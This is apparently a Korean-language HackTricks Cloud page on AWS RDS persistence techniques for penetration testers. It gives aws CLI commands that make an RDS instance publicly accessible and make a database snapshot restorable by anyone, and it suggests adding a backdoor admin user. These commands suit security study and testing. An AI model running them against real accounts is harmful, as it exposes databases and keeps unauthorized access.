Korean - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - RDS Persistence

Support HackTricks

RDS

더 많은 정보는 다음을 확인하세요:

AWS - Relational Database (RDS) Enum

인스턴스를 공개적으로 접근 가능하게 만들기: rds:ModifyDBInstance

이 권한을 가진 공격자는 기존 RDS 인스턴스를 수정하여 공개 접근성을 활성화할 수 있습니다.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB 내에 관리자 사용자 생성

공격자는 DB 내에 사용자를 생성하여 마스터 사용자의 비밀번호가 변경되더라도 데이터베이스에 대한 접근을 잃지 않도록 할 수 있습니다.

스냅샷을 공개로 설정

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
HackTricks 지원하기
PreviousAWS - Lightsail PersistenceNextAWS - S3 Persistence

Last updated